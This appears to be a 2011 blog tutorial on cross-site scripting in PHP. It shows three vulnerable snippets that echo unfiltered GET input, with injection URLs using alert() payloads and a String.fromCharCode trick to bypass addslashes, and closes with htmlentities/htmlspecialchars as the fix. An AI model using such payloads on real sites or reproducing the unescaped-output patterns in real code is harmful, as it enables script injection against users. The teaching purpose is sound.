Saturday, March 26, 2011

Cross-Site Scripting

You can use alot of vectors,can try alot of bypass methods,you can find them around the web.



Basic example
- Code snippet from test.php

---------------------------------
<?php
$name=$_GET['name'];
print $name;
?>
---------------------------------

The input is not filtered,an attacker can inject Javascript code.Example :

http://127.0.0.1/test.php?name=<script>alert("XSS")</script>


A popup with XSS message will be displayed.Javascript code succesfully executed.

Another example

- Code snippet from test.php

-------------------------------------------
<?php
$name=addslashes($_GET['name']);
print '<table name="'.$name.'"></table>';
?>
-------------------------------------------

Not an advanced example,only a bit complicated.

http://127.0.0.1/test.php?name="><script>alert(String.fromCharCode(88,83,83)) </script>

Why this vector?We put " because we must close the " from the "name" atribut
of the "table" tag and > to close the "table" tag.Why String.fromCharCode?Because
we want to bypass addslashes() function.Injection done.

Simple example

- Code snippet from modules.php

---------------------------------------------------------------------------
if (isset($name)) {
.................... etc................
} else {
die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");
---------------------------------------------------------------------------

The "name" variable is injectable,input is not filtered,so we can inject
with ease Javascript code.Example :

http://127.0.0.1/test.php?name=<script>alert("XSS")</script>

  How to fix?
Simple way : Use htmlentities() or htmlspecialchars() functions.
Example : $name=htmlentities($_GET['name']);
Another way : Filter all special chars used for XSS ( a lot ).
The best way is the first method.


This post originally from --  J|nX

0 comments:

Post a Comment